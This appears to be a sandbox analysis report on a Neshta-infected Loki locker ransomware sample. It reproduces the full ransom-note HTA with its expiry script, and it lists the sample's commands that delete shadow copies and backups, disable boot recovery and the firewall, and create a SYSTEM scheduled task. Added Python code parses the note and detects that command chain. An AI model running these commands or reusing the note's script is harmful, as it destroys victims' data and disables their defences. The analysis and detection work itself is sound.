Analysis

  • max time kernel
    149s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-10-2024 04:40

General

  • Target

    2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe

  • Size

    520KB

  • MD5

    9da2c0bd42d714d127f2756671426972

  • SHA1

    e879856aa0d650acc31de610f6de30e70efbee7b

  • SHA256

    3006f4700c203366244df77f5f45caae705d79540c65769bd71292eba0fbe7d2

  • SHA512

    b5a353809f6076f3effc865c70cabc0079fb01612e08afb14a7947827e3a3149f2e2ba415fce949670065d4e8530e6d243f42e4037a6f871fde027f6a0840229

  • SSDEEP

    6144:k9iBKeyvrf7JR4CDFudez0e9YaVX0cBdxLPlk3XrvPVdNT6zncVUJKWehinom6r4:crDQ0FXzWazdxWrlTT6zncVUJ7vnd6r4

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\info.hta

Ransom Note
<html> <head> <title>Loki locker</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head> <style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}#t{text-align: center; color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{text-align: center; font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; text-align: center; border-bottom: 0; font-size: 2vw;}</style> <script>var countDownDate = new Date(2024,10,24,4,41,18).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script> <body > <h1 id="t">All your files have been encrypted by Loki locker!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">[email protected]</span> </p><br><p class="t"> You have to pay for decryption in Bitcoin. 
The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">[email protected]</span> <br>Your unique ID is : <span class="m">60C086EC</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. 
just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body> </html>
Emails

[email protected]

[email protected]

URLs

None. The extractor's single hit, http-equiv="x-ua-compatible", is the <meta> attribute inside the HTA, not a URL; the note offers e-mail contact only and the sandbox recorded no network activity for this run.
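Two details in the note above are worth pulling out programmatically rather than by eye, because the sandbox's own "Emails"/"URLs" extraction mis-fired on HTML attributes. First, the countdown target is written as new Date(2024,10,24,4,41,18): JavaScript months are zero-based, so that is 24 November 2024, thirty days after this run was submitted, even though the text threatens a 48-hour doubling. Second, when the timer expires the HTA does not merely change a string: it launches C:\ProgramData\winlogon.exe through WScript.Shell (a different path from the %APPDATA%\winlogon.exe that the scheduled task points at). The following is an added example, not code from the page or from the sample, that parses those fields from an excerpt of the note; NOTE_EXCERPT is copied from the note above (the mailbox strings are the page's "[email protected]" placeholders and are treated as opaque contact tokens), and ANALYSIS_SUBMITTED and the function names are mine.

```python
"""Parse analyst-relevant fields from the Loki locker info.hta note.
Added example, not sandbox or sample code; NOTE_EXCERPT is copied from the
note in this report, ANALYSIS_SUBMITTED from its "submitted" field."""
import re
from datetime import datetime

ANALYSIS_SUBMITTED = datetime(2024, 10, 25, 4, 40)

# Constructed input: the countdown <script> and the <span class="m"> values
# from the note; e-mail addresses are the page's placeholders, not mailboxes.
NOTE_EXCERPT = r'''<script>var countDownDate = new Date(2024,10,24,4,41,18).getTime();
var x = setInterval(function () { var now = new Date().getTime();
var distance = countDownDate - now; if (distance < 0) { clearInterval(x);
document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)";
WshShell = new ActiveXObject("WScript.Shell");
WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script>
<p>please send an email <span class="m">[email protected]</span></p>
<p>write to this email <span class="m">[email protected]</span>
Your unique ID is : <span class="m">60C086EC</span></p>'''

DATE_CTOR = re.compile(r"new Date\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
SHELL_RUN = re.compile(r'WshShell\.Run\("((?:[^"\\]|\\.)*)"')
MARKED = re.compile(r'<span class="m">(.*?)</span>')
ID_SHAPE = re.compile(r"[0-9A-F]{6,}")


def deadline(note: str) -> datetime:
    """Countdown target. JavaScript Date() months are 0-based, so
    new Date(2024,10,24,...) is 24 November 2024, not 24 October."""
    m = DATE_CTOR.search(note)
    if m is None:
        raise ValueError("no countdown target in note")
    y, mo, d, h, mi, s = map(int, m.groups())
    return datetime(y, mo + 1, d, h, mi, s)


def expiry_action(note: str) -> str:
    """Path launched through WScript.Shell when the timer reaches zero,
    with the JavaScript string escaping undone."""
    m = SHELL_RUN.search(note)
    if m is None:
        raise ValueError("no WshShell.Run call in note")
    return m.group(1).replace("\\\\", "\\")


def victim_id(note: str) -> str:
    """The highlighted value shaped like a hex victim ID."""
    return next(v for v in MARKED.findall(note) if ID_SHAPE.fullmatch(v))


def contacts(note: str) -> list[str]:
    """Highlighted values that are not the ID: the operator's contact tokens."""
    return [v for v in MARKED.findall(note) if not ID_SHAPE.fullmatch(v)]


def days_left(note: str, at: datetime) -> int:
    """Whole days from a reference time to the embedded deadline."""
    return (deadline(note) - at).days


if __name__ == "__main__":
    print("deadline      :", deadline(NOTE_EXCERPT).isoformat())
    print("days from run :", days_left(NOTE_EXCERPT, ANALYSIS_SUBMITTED))
    print("on expiry runs:", expiry_action(NOTE_EXCERPT))
    print("victim id     :", victim_id(NOTE_EXCERPT))
    print("contacts      :", contacts(NOTE_EXCERPT))
```

Run against the excerpt this reports a deadline of 2024-11-24T04:41:18, 30 days after submission, and C:\ProgramData\winlogon.exe as the expiry action. Note that in this run every one of the five mshta.exe launches of info.hta crashed under WerFault (see Processes), so the timer logic most likely never executed in the sandbox; the embedded values are still the ones to record as indicators.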

Signatures

  • Detect Neshta payload 4 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Neshta

    Neshta is a file infector: it prepends its own code to executables it finds and, when an infected program is run, writes the original host out to %TEMP%\3582-490\ and launches it. That is why the 520KB submitted file spawns a 480KB copy of itself from that directory (PID 1772 below): the infector is only a ~40KB carrier, and the payload doing the damage in this run is the infected host, Loki locker.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials. For a file encryptor this signature can also fire simply because browser profile directories are walked during encryption; the Network section of this report is empty, so treat this as file access rather than confirmed credential theft.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. The helper-DLL persistence technique is flagged here on the strength of netsh.exe running; the two invocations in the process tree only switch the firewall off (netsh advfirewall set currentprofile state off, netsh firewall set opmode mode=disable), so the behaviour that matters is firewall tampering, not a helper DLL registration.

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments. Here the hit is on vds.exe, the Windows Virtual Disk Service started as a side effect of the backup deletion, not on the sample itself, so it is not evidence of sandbox evasion by the malware.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 2 IoCs
  • Modifies registry class 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe"
    1⤵
    • Checks computer location settings
    • Modifies system executable filetype association
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4548
    • C:\Users\Admin\AppData\Local\Temp\3582-490\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe"
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Modifies Control Panel
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:1772
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5540
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:5620
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ik4g2jej\ik4g2jej.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5956
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E03.tmp" "c:\ProgramData\CSC7092410443034CA69447916971627D0.TMP"
          4⤵
            PID:3432
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5508
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:3464
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5432
        • C:\Windows\system32\wbadmin.exe
          wbadmin DELETE SYSTEMSTATEBACKUP
          4⤵
          • Deletes System State backups
          PID:2348
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5740
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3560
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:472
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:2280
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2192
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:4952
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4304
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:4636
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:228
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set currentprofile state off
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:1072
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4788
        • C:\Windows\system32\netsh.exe
          netsh firewall set opmode mode=disable
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:3660
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5996
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 1440
          4⤵
          • Program crash
          PID:4736
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2516
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 1336
          4⤵
          • Program crash
          PID:5204
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5456
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 1336
          4⤵
          • Program crash
          PID:5192
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3124
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 332
          4⤵
          • Program crash
          PID:5344
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4056
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3640
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:5072
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:4740
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    • Checks SCSI registry key(s)
    PID:4752
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5996 -ip 5996
    1⤵
    PID:5276
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2516 -ip 2516
    1⤵
    PID:5164
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5456 -ip 5456
    1⤵
    PID:4876
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 3124
    1⤵
    PID:116
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4056 -ip 4056
    1⤵
    PID:4624
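The high-signal part of this tree is the run of legitimate admin tools (vssadmin, wbadmin, wmic, bcdedit, netsh, schtasks) that PID 1772 drives through cmd.exe /C wrappers before anything is encrypted; taken one at a time each is benign, taken together they are the pre-encryption pattern. The following is an added example, not code from the sandbox or from the sample, of turning the tree into detection logic: process-creation events constructed from the command lines shown above are run through image-plus-command-line rules, each hit is attributed past the cmd.exe hop to the process that issued it, and a verdict is raised when several distinct recovery-inhibition commands cluster with a firewall or persistence change. The ProcEvent type, rule names, ATT&CK mappings and the root process's parent pid are mine, not the sandbox's signatures.

```python
"""Rule-based triage of a process tree: added example, not sandbox code.
EVENTS is constructed from the Processes section; root ppid 1 is assumed."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # full path of the executable
    cmdline: str  # command line as logged


# (rule, ATT&CK technique, regex over image path, regex over command line)
RULES = [
    ("host relaunched from Neshta drop dir", "Neshta file infector",
     r"\\temp\\3582-490\\[^\\]+\.exe$", r""),
    ("shadow copies deleted", "T1490",
     r"\\vssadmin\.exe$", r"delete\s+shadows"),
    ("shadow copies deleted via WMI", "T1490",
     r"\\wmic\.exe$", r"shadowcopy\s+delete"),
    ("backup catalog or system state deleted", "T1490",
     r"\\wbadmin\.exe$", r"delete\s+(catalog|systemstatebackup)"),
    ("boot recovery disabled", "T1490",
     r"\\bcdedit\.exe$", r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures"),
    ("host firewall disabled", "T1562.004",
     r"\\netsh\.exe$", r"advfirewall\s+set\s+\w+\s+state\s+off|set\s+opmode\s+mode=disable"),
    ("logon task as SYSTEM pointing into a user profile", "T1053.005",
     r"\\schtasks\.exe$", r"/create.*?/sc\s+onlogon.*?/tr\s+\S*\\users\\.*?/ru\s+system"),
    ("HTA run from Temp", "T1218.005",
     r"\\mshta\.exe$", r'\\temp\\[^\s"]+\.hta'),
    ("C# compiled at runtime from Temp", "T1027.004",
     r"\\csc\.exe$", r'@"?[^\s"]*\\temp\\[^\s"]+\.cmdline'),
]


def match_rules(ev):
    """(rule, technique) pairs whose image and cmdline patterns both match."""
    return [(rule, tech) for rule, tech, img_re, cmd_re in RULES
            if re.search(img_re, ev.image, re.I) and re.search(cmd_re, ev.cmdline, re.I)]


def issuer(ev, by_pid):
    """Walk up through cmd.exe /C wrappers to the process that issued the command."""
    cur = ev
    while (parent := by_pid.get(cur.ppid)) is not None:
        if not re.search(r"\\cmd\.exe$", parent.image, re.I):
            return parent.pid
        cur = parent
    return cur.pid


def analyse(events):
    """Group rule hits by issuing process and return (findings, verdicts)."""
    by_pid = {e.pid: e for e in events}
    findings = defaultdict(list)
    for ev in events:
        for hit in match_rules(ev):
            findings[issuer(ev, by_pid)].append(hit)
    verdicts = {}
    for pid, hits in findings.items():
        techniques = {t for _, t in hits}
        recovery = {r for r, t in hits if t == "T1490"}
        # >= 3 distinct recovery-inhibition commands plus a firewall or
        # persistence change is the pre-encryption pattern in this report.
        chain = len(recovery) >= 3 and bool(techniques & {"T1562.004", "T1053.005"})
        verdicts[pid] = "ransomware pre-encryption chain" if chain else "suspicious"
    return dict(findings), verdicts


def p(*parts):
    return "\\".join(parts)


T = r"C:\Users\Admin\AppData\Local\Temp"
S = r"C:\Windows\System32"
SAMPLE = "2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe"
TASK = (r"schtasks /CREATE /SC ONLOGON /TN Loki "
        r"/TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F")


def via_cmd(cmd_pid, child_pid, exe, args):
    """A cmd.exe /C wrapper (child of PID 1772, as in this tree) plus its child."""
    return [(cmd_pid, 1772, p(S, "cmd.exe"), "cmd.exe /C " + args),
            (child_pid, cmd_pid, p(S, *exe), args)]


# Constructed from the process tree above: (pid, ppid, image, cmdline).
EVENTS = [ProcEvent(*e) for e in [
    (4548, 1, p(T, SAMPLE), SAMPLE),
    (1772, 4548, p(T, "3582-490", SAMPLE), SAMPLE),
    (5956, 1772, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     r'csc.exe /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ik4g2jej\ik4g2jej.cmdline"'),
    (5996, 1772, r"C:\Windows\SysWOW64\mshta.exe",
     r'mshta.exe "C:\Users\Admin\AppData\Local\Temp\info.hta"'),
    *via_cmd(5540, 5620, ["schtasks.exe"], TASK),
    *via_cmd(5508, 3464, ["vssadmin.exe"], "vssadmin delete shadows /all /quiet"),
    *via_cmd(5432, 2348, ["wbadmin.exe"], "wbadmin DELETE SYSTEMSTATEBACKUP"),
    *via_cmd(5740, 3560, ["Wbem", "WMIC.exe"], "wmic shadowcopy delete"),
    *via_cmd(472, 2280, ["wbadmin.exe"], "wbadmin delete catalog -quiet"),
    *via_cmd(2192, 4952, ["bcdedit.exe"], "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    *via_cmd(4304, 4636, ["bcdedit.exe"], "bcdedit /set {default} recoveryenabled no"),
    *via_cmd(228, 1072, ["netsh.exe"], "netsh advfirewall set currentprofile state off"),
    *via_cmd(4788, 3660, ["netsh.exe"], "netsh firewall set opmode mode=disable"),
]]

if __name__ == "__main__":
    findings, verdicts = analyse(EVENTS)
    for pid, verdict in verdicts.items():
        print(pid, verdict, [rule for rule, _ in findings[pid]])
```

Run as a script this attributes eleven hits across five techniques to PID 1772 (the Loki locker host relaunched by Neshta) and flags it as the pre-encryption chain, while PID 4548 (the Neshta carrier) collects only the drop-directory relaunch. A real pipeline would feed Sysmon event 1 or EDR process-start records into ProcEvent; the only fields used are pid, ppid, image and command line, and attributing through cmd.exe is what keeps the ten separate wrappers from looking like ten unrelated one-off commands.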

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE
    Filesize 86KB
    MD5 3b73078a714bf61d1c19ebc3afc0e454
    SHA1 9abeabd74613a2f533e2244c9ee6f967188e4e7e
    SHA256 ded54d1fcca07b6bff2bc3b9a1131eac29ff1f836e5d7a7c5c325ec5abe96e29
    SHA512 75959d4e8a7649c3268b551a2a378e6d27c0bfb03d2422ebeeb67b0a3f78c079473214057518930f2d72773ce79b106fd2d78405e8e3d8883459dcbb49c163c4

  • C:\ProgramData\3uct2nhv.exe
    Filesize 32KB
    MD5 24d8285a1eb965b7ae5adf7d569d4fa0
    SHA1 245b356fcfcb8c3d05fc50faed1b25b4ee9a6a15
    SHA256 a757af448c164b3832344d63dfbe4e6cc620b001a3ea5ce8ee08535de6e3b46b
    SHA512 7f662ddf7748a03faf9da50c0f9d5921536042565c66ad958a044cf7abdddde2f1776763a61d9cc58cc7678dbc8136ae74438231edb6008db4d22d6cf639d70a

  • C:\Users\Admin\AppData\Local\Temp\3582-490\2024-10-25_9da2c0bd42d714d127f2756671426972_neshta_wannacry.exe
    Filesize 480KB
    MD5 dc2d7175e98b8592988849b695c179b1
    SHA1 8061dcc212a3818cafcd5857ddd4fddde605d9df
    SHA256 621736b0a31afd25930f89be064edcdbcd151480ea7f45ee6fa2fdb4c443ee9c
    SHA512 329c5127c92e726c88d969aad32d79450eab3c614446ca4fd2d9e43e4beeec3eb1da2827e0e75629ce2f23770941f8f15e4310ffb532d28d6381143a62287762

  • C:\Users\Admin\AppData\Local\Temp\RES1E03.tmp
    Filesize 29KB
    MD5 9c6754246000ac960c793768d584c747
    SHA1 9eb097e02d81c73618ee04edd100e41c69635ac6
    SHA256 b91a38f46b532c95583114f644669347479d0fa414124f32e505085653a1d7c3
    SHA512 1800e564f9c5e16c0509bbc7d80849b7f39c8df5dbf5d8e026ea089cc737b850c4d4162f746e7fea54adffa3a40790a8a5d358abfb45dfa45dd1b25b77adaef5

  • C:\Users\Admin\AppData\Local\Temp\info.hta
    Filesize 3KB
    MD5 eab668b8557633a6818ddb68c299bd2e
    SHA1 15b810f7157eff057b5901f5536023fd8fce636e
    SHA256 6e59dcc7701953797444e89648d3846d972ed43c87fde531b2ce697b5cca0cdc
    SHA512 0071cbf8d95289198e68775a079d2e153e1a16d2ed06d2121b226f9bf798fe48632f9b1f9c6aac368afe8f5162936578bdf474ddacf8ace19e3c8d037f06c030

  • C:\Users\Admin\Desktop\Cpriv.Loki
    Filesize 2KB
    MD5 a30eb463291f2c86d408aaa5aab52262
    SHA1 ed20698517519b13d49a8744d0a232de3bf7e7bd
    SHA256 2b5c07f9399e3b331c4af6fd6ba922f5d490b15199633fdb3bf23704e82cd5c6
    SHA512 92148fa03dd5270ba29e3ba71fd73266293e9b814e9594d0f7e012d90b7265a0b53fe155618dc752b08e5b2ff438632543e0e2900cdf4bc2375e58915dd1b80f

  • C:\Users\Admin\Documents\Restore-My-Files.txt
    Filesize 335B
    MD5 01e80cdae0c2c8babc728f2b20a0a3d6
    SHA1 40d7f5a54da5bbd8dcb299b7d940478517702440
    SHA256 89b06c401b92a5b5ab2e223d36bd306f49027a11238f7cb94886e35e48ec02ee
    SHA512 29bf5aa06bd1d2565d6917aa6f1d8fa9d34ac2cd9b7efaef559bb2a283f316d5e998233580ecc9c8882aa20e7d0e34813a05fa00a9a8a2fb22b5b247a7b45a26

  • \??\c:\ProgramData\CSC7092410443034CA69447916971627D0.TMP
    Filesize 28KB
    MD5 c9e37ffcaa4295dfb4bab2735a915d8d
    SHA1 84c062568a5b54ba1d3643849a5bf89289d6fb9f
    SHA256 efaf226cdf7cbf59e397178444772dde249cedcc990f4568714d2165907fe6c8
